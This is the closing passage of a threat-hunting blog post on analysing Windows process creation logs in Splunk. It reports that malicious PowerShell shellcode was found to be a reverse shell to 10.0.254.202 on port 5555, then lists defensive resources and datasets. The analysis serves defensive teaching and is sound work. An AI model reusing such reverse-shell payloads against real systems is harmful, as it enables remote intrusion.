Scdbg reveals our shellcode is a reverse shell to 10.0.254.202 on port 5555/tcp. This PowerShell script is a giant bucket of nope.
At this point we’ve verified that the block of PowerShell we’ve analyzed is nothing good. This is as good a starting point and hands-on example as I could hope to provide, having both provided examples of a false positive, as well as a true positive and how to analyze it.
Additional Reading and Resources
Looking for some more inspiration? Here are some projects/trainings that have helped me out immensely at becoming a better threat hunter in general:
Adama – This project is pretty amazing. To make a long story short, it’s a collection of queries, most of them formatted for use with ELK (ElasticSearch, Logstash, Kibana) software stacks, but with a little bit of time and tinkering, it can easily be adapted to the Splunk query language.
JPCERT – Tool Analysis Result Sheet – JPCERT has gone through the trouble of running several tools that attackers and adversaries use as a part of their operations and documenting where evidence of these tools executing can be found.
Sigma – Sigma is a project like Adama, but it’s designed to be agnostic to whatever SIEM you happen to be using. Sigma has a converter application that can turn Sigma descriptions into a query that runs on a bunch of different SIEMs (including Splunk).
Practical Threat Hunting – This is a guided training by Chris Sanders. Current price to attend the training is 647.00 USD, but I feel like the price tag is worth it. There is a lot of stuff that Chris exposes you to as a part of the training. I’m not ashamed to say that this blog post is inspired from the training itself. Also, so you’re aware, I am an Applied Network Defense trainer myself, and am I NOT being paid to advertise Chris’ training, NOR am I being given the training for free. It’s just that good.
CPTC dataset – All of this process creation log stuff sounds really awesome, but what if I want sample dataset to practice with? This is a dataset collected from the 2019 National Collegiate Penetration Testing Competition. This dataset will allow you to practice, experiment and demonstrate the value of these logs. Without Tom Kopchak’s hard work, the screen captures accompanying this post would not have been possible. Thanks, Tom!
I know that this blog post was mainly focused on process creation logs for Windows, but what about the Linux and OSX users out there? If you’re looking for something similar that could be used to log process execution data, Linux has a few options in Auditd and Snoopy. I only recently discovered that OSX has a native audit subsystem as well. A multiplatform alternative might be osquery.
We have covered a lot of ground in these three blog posts–getting you familiar with process creation logs, getting them into Splunk for analysis, and then learning how to query them to discover anomalies. We’ve gone through a hands-on example together, and I’ve left you with a handful of resources you can use to jumpstart your threat hunting activities.
Bear in mind that if you chose to follow along with me, the CPTC dataset is massive, and there is a ton of other data you can analyze as well. Also keep in mind that the CPTC dataset is not the only Splunk data set out there, with Splunk providing data for both Boss of the SOC 1 and Boss of the SOC 2 competitions.
Good luck, and happy hunting.